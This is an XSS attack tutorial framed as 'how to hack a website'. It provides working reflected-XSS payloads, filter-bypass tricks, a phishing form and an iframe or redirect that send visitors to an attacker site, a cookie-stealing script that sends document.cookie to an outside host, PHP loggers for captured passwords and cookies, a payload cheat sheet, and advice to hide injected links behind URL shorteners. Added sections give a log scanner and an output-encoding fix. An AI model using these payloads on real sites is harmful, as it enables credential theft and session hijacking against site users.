Today I will tell you how to hack a website using XSS
What exactly is XSS?
"XSS" is short for "Cross Site Scripting". As the name says, XSS deals with scripting, more exactly Javascript: it's about injecting (almost) any Javascript (and html/css) command or script into a website. An XSS flaw comes up every time a website doesn't filter the attacker's input. In other words: the attacker can inject his malicious script into a website, and the browser just runs the code or script.
There are 3 types of XSS; I'm going to talk about the 2 most used:
$ Reflected XSS Attack:
$ When an attacker injects his malicious script into a search query, a search box,
$ or the end of a url, it's called a Reflected XSS Attack. It's like throwing a ball
$ against a wall and getting it back.
$ Stored XSS Attack:
$ Is when an injected XSS script is stored permanently on a website, for example in
$ a guestbook or bulletin board. Stored XSS hits everyone who simply reaches the
$ page with the malicious code.
$ DOM based XSS:
$ This is a rarely used method; perhaps I'm going to write another whitepaper about
$ DOM based XSS attacks.
How to execute XSS commands
Actually, injecting an XSS script is very easy. To check whether the target website is vulnerable, just look for a search box or something similar. Let's say this is what a simple, unsecured search function looks like:
content of index.html
content of google.php
# I'm going to use this script as an example for the rest of this paper #
Let's say this script is stored on a webspace. When I type in:
123
then it leads me to the url:
http://site.ru/google.php?search=123
and shows me
123
But now, let's try to inject a simple javascript alert message:
and send it.
You can replace "turtles" with any other word you want, and even use ' ' instead
of " ", for example:
But I'll keep using "turtles" as the example for the rest of this paper.
The target website lets us know it's vulnerable when it prints a popup containing
|=========| |======|
| turtles | or | 1234 |
|=========| |======|
Instead of the code above, we can even inject any simple html tag, e.g.:
and send it.
Also, you can paste the code at the end of the url, and visit the site like:
or
# It's like the attacker is determining the content of the website. #
But even if this doesn't work, there's no reason to worry: it means the website
uses filter techniques to avoid XSS flaws. But there are also ways to
bypass those filters. How this works, you're going to read in the next chapter.
Bypass techniques
There are a lot of ways to bypass XSS filters on websites; I'll list some:
1.) magic_quotes_gpc=ON bypass
2.) HEX encoding
3.) Obfuscation
4.) Trying around
1.) magic_quotes_gpc=ON is a php setting (php.ini).
It causes every ' (single quote), " (double quote) and \ (backslash)
to be escaped with a backslash automatically. It's also a well known method
to avoid XSS flaws, although it's exploitable.
How to bypass it when it's ON? - use the javascript function called
String.fromCharCode(): just convert your text into decimal character codes
(e.g. here: http://www.asciizeichen.de/tabelle.html) and pass them to the function.
Using "turtles" (without quotes) will look like this:
String.fromCharCode(116, 117, 114, 116, 108, 101, 115)
Now insert this in your alert script:
2.) HEX encoding is a useful bypass method, too. This step encodes
your script, so at first glance you can't clearly see what the code will do.
This is how
looks encoded in HEX:
3.) Obfuscation - sometimes website administrators simply put words like
"script", "alert()", "''" on a "bad words list". That means when you
search for "script" on the website, it just shows you an error like
"you are not allowed to search for this word" or something.
But this is a weak protection; you can bypass it by obfuscating
your javascript code, like:
There are almost unlimited possibilities, but that leads us to the
next chapter...
4.) Trying around: sometimes you just have to try things, because every website
is secured (or unsecured) in a different, unique way. Some don't even use
cookies, for example. Always keep an eye on the website's source code!
Sometimes you need to adjust your XSS script, like:
You need this sometimes if you injected your code into a search box, e.g., and
interrupt an html tag, so you first need to close it, then start a new
tag (<script>...).
Anyway, there are lots of different methods to bypass XSS filtering;
try around!
What can we do with XSS ?
Until now I showed you how to spawn a javascript alert message on a website.
But now I'll show you how harmful such an XSS flaw can be for your website. Here are
some attack techniques you can do with an XSS flaw:
1.) Inject a Phishing script
2.) Iframe Phishing
3.) Redirect Phishing
4.) Cookie stealing
1.) Phishing script inject: Just inject a 'user' and 'password' field in html
(with the <html> and <body> tags), so that the victim may think he needs
to log in to the target site.
Here an example:
www.site.ru/google.php?search=<html><body><head><meta content="text/html; charset=utf-8"></meta></head>
<div style="text-align: center;"><form Method="POST" Action="http://www.phishingsite.ru/phishingscript.php">
Phishingpage :<br /><br/>Username :<br /> <input name="User" /><br />Password :<br />
<input name="Password" type="password" /><br /><br /><input name="Valid" value="Ok !" type="submit" />
<br /></form></div></body></html>
content of phishingscript.php
<?php
// field names must match the form above ("User" / "Password")
$login = $_POST['User'];
$password = $_POST['Password'];
$open = fopen('log.txt', 'a+');
fputs($open, 'Username : ' . $login . '<br >' . '
Password : ' . $password . '<br >' . '<br >');
fclose($open);
?>
2.) Iframe Phishing: Simple thing, just inject a javascript code containing an
iframe where your phishing site is embedded.
Obviously it needs to look just like the target site.
Here is an example:
www.site.ru/google.php?search=<iframe src="http://www.yourphishingsite.ru" height="100%" width="100%"></iframe>
(Note: height="100%" width="100%" means that the whole window is filled with that iframe.)
The target site will show your phishing site in an iframe, and the website users / victims won't see a
difference and log in (if they're foolish enough).
3.) Redirection Phishing: Also simple, just inject a javascript redirection
script that leads to your phishing site; of course it needs to look just
like the target site.
Here an example:
www.site.ru/google.php?search=<script>document.location.href="http://www.yourphishingsite.ru"</script>
or
www.site.ru/google.php?search=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://www.yourphishingsite.ru">
4.) Cookie stealing: One of the most feared things about XSS flaws is the cookie stealing
attack. For this method you need to do the following:
Place this cookiestealer.php on your hoster, and then inject a javascript
with your cookie stealer script embedded into your target website.
content of cookiestealer.php (found it somewhere with google)
<?php
// $HTTP_GET_VARS from the original has long been removed from PHP; $_GET is the equivalent
$cookie = $_GET["cookie"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookie . "\n\n");
fclose($file);
?>
Save it as cookiestealer.php, create a 'log.txt', upload both files
to your own webspace in the same directory and set "chmod 777".
Inject the following code in your target website:
http://www.site.ru/google.php?search=<script>location.href = 'http://phishingsite.ru/cookiestealer.php?cookie='+document.cookie;</script>
Then the victim's cookie (of the target website's user who visited the url above) should
appear in log.txt.
Now you simply need to insert the cookie (with e.g. the Live HTTP Headers firefox addon)
and use it.
Obviously you need to replace
http://www.yourphishingsite.ru
with the url of your phishing site.
# PROTIP: rename your 'cookiestealer.php' to something like 'turtles.php', #
# this looks less suspicious.
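Every attack in this chapter travels in the search parameter of a GET request, so the web server's access log keeps a record of it. The following script is an added example, not code from the original paper: it scans access-log lines for the indicators the paper itself describes (raw html tags in a parameter, javascript: URLs, and String.fromCharCode used to dodge quote escaping) and reports the client address and parameter for each hit. The log lines, the IP addresses and the function names query_params() and scan_log() are constructed for this example; only google.php and the search parameter come from the paper.

```php
<?php
// Added example (not from the original paper): flag reflected-XSS attempts
// in web-server access-log lines by decoding the query string and checking
// each parameter value against a few indicators described in the paper.

declare(strict_types=1);

// Constructed sample lines in the common log format (not real traffic).
const SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /google.php?search=turtles HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /google.php?search=%3Cscript%3Ealert(%22turtles%22)%3C/script%3E HTTP/1.1" 200 640',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /google.php?search=%3Ciframe+src%3D%22http://www.yourphishingsite.ru%22%3E HTTP/1.1" 200 700',
    '198.51.100.7 - - [10/Oct/2023:13:56:12 +0000] "GET /google.php?search=String.fromCharCode(116,117) HTTP/1.1" 200 520',
];

// Indicators taken from the techniques shown in this paper.
const INDICATORS = [
    '/<\s*\/?\s*[a-z]/i'       => 'html tag in parameter',
    '/javascript\s*:/i'         => 'javascript: URL',
    '/String\.fromCharCode/i'   => 'fromCharCode encoding',
];

/**
 * Extract the url-decoded query parameters of one access-log line.
 * Returns an empty array when the request line has no query string.
 */
function query_params(string $line): array
{
    if (!preg_match('/"[A-Z]+ ([^ "]+) HTTP\/[0-9.]+"/', $line, $m)) {
        return [];
    }
    $query = parse_url($m[1], PHP_URL_QUERY);
    if (!is_string($query)) {
        return [];
    }
    $params = [];
    parse_str($query, $params); // parse_str() url-decodes every value
    return $params;
}

/**
 * Return one finding [ip, parameter name, reason] per suspicious parameter.
 */
function scan_log(array $lines): array
{
    $findings = [];
    foreach ($lines as $line) {
        $ip = explode(' ', $line, 2)[0];
        foreach (query_params($line) as $name => $value) {
            if (!is_string($value)) {
                continue; // nested array parameters are out of scope here
            }
            foreach (INDICATORS as $pattern => $reason) {
                if (preg_match($pattern, $value)) {
                    $findings[] = [$ip, (string) $name, $reason];
                    break; // one reason per parameter is enough for a report
                }
            }
        }
    }
    return $findings;
}

foreach (scan_log(SAMPLE_LOG) as [$ip, $param, $reason]) {
    printf("%-15s parameter '%s': %s\n", $ip, $param, $reason);
}
```

Run with `php scan.php`: the plain "turtles" search is not reported, the three lines carrying a tag or a fromCharCode call are. Decoding before matching is the important step; the raw log line only contains %3C and %3E, which a naive grep for "<script" never sees. Stored XSS delivered through a POST form does not show up in the query string at all, so this catches only the reflected variant the paper uses.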
How to fix XSS leakages
XSS flaws can be very dangerous for your website, but you can easily secure your own website using the following functions.
##########################################################
# #
# htmlspecialchars() #
# http://php.net/manual/de/function.htmlspecialchars.php #
# #
##########################################################
Example usage:
google.php:
<?php echo htmlspecialchars($_GET['search']); ?>
$ OR
##########################################################
# #
# htmlentities() #
# http://php.net/manual/de/function.htmlentities.php #
# #
##########################################################
Example usage:
google.php:
<?php echo htmlentities($_GET['search']); ?>
What happened? - the function simply replaced every special character with a harmless html entity.
For example, when I enter
<script>alert("Vishalsangwa");</script>
it appears as
<script>alert("Vishalsangwa");</script>
but without any popup, because the characters <, >, ', "
turned into &lt;, &gt;, &#039;, &quot;
The attacker's input has become harmless, unexecutable html code.
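The fix above is the right one, but as written it is incomplete: before PHP 8.1 htmlspecialchars() with its default flags leaves the single quote alone, and the browser also has to know the page's charset. Below is an added example, not code from the original paper, of google.php with the encoder called with explicit flags, the response charset declared, and the session cookie marked HttpOnly so that the document.cookie read in the cookie-stealing chapter returns nothing useful. The helpers html_encode() and render_search_page(), the page layout and the cookie settings are my assumptions; only the search parameter and the test string come from the paper. magic_quotes_gpc, which the bypass chapter discusses, was removed in PHP 5.4 and was never a substitute for output encoding.

```php
<?php
// Added example (not the paper's code): the paper's search page with output
// encoding applied at the point where user text enters the html, plus the
// cookie flag that keeps the session id out of document.cookie.

declare(strict_types=1);

/**
 * Encode untrusted text for insertion into html text or a quoted attribute.
 * ENT_QUOTES also converts the single quote, which the default flags before
 * PHP 8.1 leave alone; ENT_SUBSTITUTE replaces invalid UTF-8 instead of
 * making htmlspecialchars() return an empty string.
 */
function html_encode(string $untrusted): string
{
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Build the result page. Every place the search text lands in the html
 * goes through html_encode(); nothing is concatenated raw.
 */
function render_search_page(string $search): string
{
    $safe = html_encode($search);
    return "<!DOCTYPE html>\n"
        . "<html><head><meta charset=\"utf-8\"><title>Search</title></head>\n"
        . "<body>\n"
        . "<form method=\"get\" action=\"google.php\">"
        . "<input name=\"search\" value=\"{$safe}\"></form>\n"
        . "<p>You searched for: {$safe}</p>\n"
        . "</body></html>\n";
}

if (PHP_SAPI === 'cli') {
    // Offline demonstration with the paper's own test input.
    $input = '<script>alert("Vishalsangwa");</script>';
    echo html_encode($input), "\n";
} else {
    // Declare the charset so the browser cannot be pushed into guessing
    // another encoding, and keep the session cookie away from scripts.
    header('Content-Type: text/html; charset=UTF-8');
    session_set_cookie_params([
        'httponly' => true,   // document.cookie no longer includes it
        'secure'   => true,   // assumption: the site is served over https
        'samesite' => 'Lax',
    ]);
    session_start();
    echo render_search_page((string) ($_GET['search'] ?? ''));
}
```

Run from the command line it prints the paper's test string with <, > and " replaced by &lt;, &gt; and &quot;, which is exactly what the browser then shows as text instead of executing. Two caveats: htmlspecialchars() is the correct encoder only when the value lands in html text or a quoted attribute; inside a <script> block, a URL or an event handler it does not help, and that context mismatch is what most of the "trying around" chapter exploits. And HttpOnly defeats the cookie-stealing script but does nothing against the injected login forms, iframes and redirects; only output encoding stops those.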
Cheat Sheets
Here is an XSS cheat sheet; I got most of these from http://ha.ckers.org/xss.html.
Enjoy.
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert(" Vishalsangwa says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
#############################################################
#
# PROTIP FOR EVERY XSS INJECTION:
# use url shortener services such as tinyurl.com or bit.ly
# to 'hide' your injection, so the victim won't know what's
# behind that url.
###############################################################